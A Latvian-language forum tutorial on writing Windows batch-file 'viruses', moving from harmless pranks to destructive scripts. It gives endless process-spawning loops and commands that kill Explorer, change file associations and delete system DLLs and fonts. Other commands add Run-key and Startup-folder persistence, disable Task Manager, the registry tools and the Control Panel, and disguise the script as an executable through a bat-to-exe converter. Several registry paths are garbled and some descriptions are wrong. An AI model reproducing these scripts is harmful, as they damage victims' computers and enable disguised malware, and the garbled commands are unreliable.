Es uzrakstīju šo rakstu, jo rakņājoties pa spokiem es atradu tikai dažas pamācības kā uztaisīt savu mini datorvīrusu. Šie vīrusi ir balstīti uz command promt comandām, un par vīrusiem tos īsti nevar nodēvēt, bet tie var nogalināt jūsu datoru. Es centīšos jums parādīt dažādus veidus, kā izveidot „vīrusus”, prikolus un tam līdzīgas programmiņas.
Ja kas piedodiet varbūt nepareizā nodaļā ievietots nezināju kur likt.
Mācības
Sāksim no visvienkāršākajām programām, kurasneko ļaunu nedara.
Sāksim ar to, ka Visus šos vīrusus mēs rakstīsim notepadā.
Cerams, ka visi zin kas ir notepad.
Lai uzzinātu iespējamās komandas, kuras var izmantot, jūs varat atrast run un tajā ierakstīt cmd. Kad atveras cmd ierakstiet tajā help. Un siediet enter. Tad uzzināsiet komandas, kuras varēsiet izmantot, bet tās nav visas un tas jums nebūs pieciešams.
Bet lai uzzinātu vienas komandas nozīmi tad jāraksta komanda, piemēram, del un tad/? Iznāk del /?.
Sāksim ar komandu start.
Ja dators zin to programmu, kuru vēlaties atvērt tad tā tiks atvērta, bet ja nezin- jāraksta ceļš- tas pēc tam.
Piemērs (rakstot programmas ir vienalga vai raksta ar lieliem burtiem vai maziem)
start mspaint - šī komanda atvērs paintu
pārējās īsās komandas
start msconfig –atver sistēmas konfigurācijas
calc vai start calc – atver kalkulatoru
start helpctr –atver palīdzību
eudcedit -simbolu pārtaisītājs
charmap –atver simbolu tabulu
dvdplay –atver muz. atsk.
taskmgr – atver task manager
defrag c: -diska c defragmentācija
chkdsk – diska pārbaude
Nu pirmais mūsu prikols
rakstam notepadā
:a
start mspaint (painta vietā var rakstīt jeb ko no iepriekš minētā)
goto :a (a vietā var rakstīt jeb ko tikai lai tie abās pusēs sakristu)
tad saglabājam visu zem jebkāda nosaukuma, bet galā jābūt .bat piemēram prikols.bat
tad veram vaļā un skatāmies kas būs.
Redzam, ka visas pildītās komandas cmd rakstās. Lai izdarītu tā, lai neredzētu pildītās komanda jāraksta sākumā @echo off
@echo off (@ nozīmē, ka tā rindiņa nerādās. echo off –nerādās visas komandas.echo on rāda visas komandas. echo rāda rindiņu.)
:a
start mspaint
goto :a
Tātad painti veras, bet mēs neredzam pildītās komandas.
varam izmantot arī komandas, kas piedod tā kā fonu
piemēram
start/max mspaint (pa visu ekrānu)
start/min mspaint (minimizēts)
cmd varat atrast citus fonus rakstot start /?
Varam izmantot privilēģijas (tās izteiks cik sistēm pievērsīs daudz „uzmanības” mūsu programmai)
start/low (maz)
start/normal
start/high
start/realtime (ļoti daudz)
Varam izmantot pavēli wait
Start/wait mspaint
msg * paints pabeigts (komanda msg * parāda logu ar teicienu un ar pogu ok)
šajā gadījumā atveras paints, un kad jūs to aizvērsiet tad parādīsies logs ar uzrakstu paints pabeigts un pogu ok
Tagad par ceļu, ir vairāki varianti kā vērt kādu failu no jebkuras vietas datorā.
sāksim
mēs atvērsim failu referats.doc kurš atrodas D diskā mapē my documents
rakstām notepadā un saglabājam .bat
start ’’d:/my documents/referats.doc’’
ir jāraksta pēdiņās, jo ja nerakstīs, tad dators meklēs d diskā mapi my un mapi documents. Šis variants ne vienmēr izdodas.
var rakstīt arī šādi
start d:/’’my documents’’/referats.doc
Ir vēlviens variants to es neatceros, ja kāds zin, lūdzu, pierakstiet komentāros. (tas nostrādā vienmēr)
Tālāk par to ko vēl var darīt ar failiem, start vietā var rakstīt: copy, xcopy, move, ren, del, erase, dir, rem
copy –kopē failu
xcopy –kopē failu kopā ar visām mapēm (ceļu)
move –pārvieto failu
ren –maina nosaukumu
del –dzēš failu(us)
erase -dzēš failu(us)
rd -dzēš failu ar ceļu
U.C.
par šo eksperimentējiet paši.
mēs varam paši mūsu failu izdzēst
start/wait mspaint
del %0
Tas nozīmē ka pēc painta aizvēršanas fails pašīznīcinās. %0 visur šī komanda nozīmē ‘’es’’.
mēs varam kaut ko izdzēst piemēram
del ’’d:/my documents/referats.doc’’
bet tad jau mums prasīs dzēst vai ne, tādēļ jāliek galā q
del ’’d:/my documents/referats.doc’’ /q
ja mēs rakstīsim šādi
rd ’’d:/my documents/referats.doc’’ /q
tad dzēsīsies varbūt d neesmu mēģinājis, my doc un referats.doc bez pieprasījuma
ja galā vēl liktu /f tad ja tas būtu read only fails tad to dzēsīs arī bez piprasījuma.
par sīkāku informāciju meklējat cmd rakstot del /?
mēs varam likt arī failiem vai mapēm atribūtus.
attrib +r +s +h +a ’’d:/my documents/referats.doc’’
r – referats paliks būs read only
s – tas kļūs par sistēmas failu
h – tas paliks par hiden
a – tas gatavs arhivēšanai (laikam arhīvs)
attrib -r -s -h -a ’’d:/my documents/referats.doc’’
noņemt atribūtus
Ja gribat slēpt mapi no kāda tad varat izdarīt tā
attrib +s +h ’’d:/my documents’’
mape ir slēpta un to neredz, atpakaļ ir mīnusi
Mēs varam datoram mainīt datumu un laiku
date 01.01.55
time 0:00
. ļauna komanda ir assoc. Tā izmaina faila tipu.
assoc .dll =.jpg
šī komanda visuss .dll mainīs uz .jpg. Mapē kur atrodas mūsu vīruss.
Izveidosim daudz mapes
md virus1
md virus2
md virus3
..
md ir veidot map, virusi 1 2 3 mapes nosaukumi, tā jūs varat piemēslot datoru
komanda label maina diska nosaukumu piem.
label d: viruss
mēs varam iznīcināt darbības piemēram Explorer.exe (var rakstīt arī citu)
taskkill /f /im Explorer.exe
par lietojumiem /f /im meklējat cmd rakstot taskkill /?
mēs varam uzstādīt gaidīšanu
ping -n 5 127.0.0.1
5- sekundes kas jāgaida
-n - pieprasījumu daudzums
127.0.0.1 -neeksistējoša ip adrese
var izmantot arī citas gaidīšanas programas.
komanda if
piemēram
if exist abcd.txt copy abcd.txt d:/anj/tdyh
to var pierkstī arī šādi(vispār jeb ko tā var pierakstīt)
if exist abcd.txt^
copy abcd.txt^
d:/anj/tdyj
komanda ^ pārnes komandu nākamajā rindā
Vēl komanda &&
start mspaint && start calc
&&- nozīmē, ka nākamā komanda pildās tikai tad, kad iepriekšējā komanda ir sekmīgi izpildīta.
Un tagad kad zināmi pamati varat veidot savus vīrusus kas vai nu pakar datoru, vai to bojā, vai iznīcina. Var vienu pimēru parādīt.
1v.
@echo off
:x
start/realtime
goto x
šis vīrus pakars nedaudz datoru jo atvērs ļoti daudzus cmd. šjā vīrusā var likt jeb ko un var izmantot arī interneta adreses, piem., www.google.lv. tātad atvērs gogli (start...) var izmantot arī vairākus goto un x
@echo off
:x
start/realtime
goto x
:x
start calc
...
un vis ko
Protams ar cmd neko grandiozu nevar uztaisīt, tādēļ jālieto citas programēšanas programas. Un tās jav ir nopietnas.
Vīrusus arī var iesviest autorunā. un tad tas vīrus pastāvīgi vērsies vaļā katru ieslēgšanās reizi.
ja nešaubos jūs vīrusa sākumā arat pierakstīt šo. Tas ir viens no variantiem.
source=C:\*.*"
set destination="C:\%USERPROFILE%\Start Menu\Programs\Startup"
copy "%source%\virusanosaukums.bat" %destination%
Un vēl viens variants
copy ""%0"" "%SystemRoot%\system32\virus.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus" /t REG_SZ /d "%SystemRoot%\system32\virus.bat" /f >nul
Un uz beigām varvēl ko pateikt. Par atslēgām (tā varētu teikt) reg add ir pievienot atslēgu.
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul-aizliedz taustiņu kombināciju ctrl+alt+delete. >nul - sūtīt komandu uz nekurieni ir iespējams iztikt bez tās.
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul -apgriež, apmaina peles taustiņus vietām. %SystemRoot% -nozīmē vienkāršos vārdos sakot sistēmu vai windovs mapi.
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t (iepriekšējo raksta vienā rindā)
REG_DWORD /d %SystemRoot%explorer.exe /f >nul -neļauj startēt exploreram.
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul -aizliedz datoru restartēt manuāli
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul -Neļauj parādīt control panel
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul -attīra darba galdu
del "%SystemRoot%Media" /q >nul -izdēš windovs skaņas
del C:windowsfonts /q >nul -izdzēš šriftus
del "%SystemRoot%system32*.dll" /q >nul -izdzēš visus sistēmas .dll
Turpinat pētīt citas bat iespējas un tas jums pavērs daydz ko.
Un lai vīrusu nomaskētu zem programmas, tad nolādējiet bat to exe konvertētāju.
Lai veicas
Es neatbildu par datoram nodarīto kaitējumu
